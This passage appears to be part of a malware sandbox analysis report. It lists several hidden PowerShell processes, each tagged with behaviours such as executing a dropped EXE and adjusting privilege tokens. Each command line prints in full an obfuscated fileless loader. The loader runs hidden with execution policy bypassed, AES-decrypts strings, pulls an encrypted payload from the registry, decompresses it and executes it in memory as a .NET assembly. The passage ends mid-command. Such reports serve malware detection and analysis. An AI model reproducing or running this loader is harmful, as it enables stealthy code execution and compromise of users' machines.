$mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1600).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1600).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:460
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1600).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1600).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] 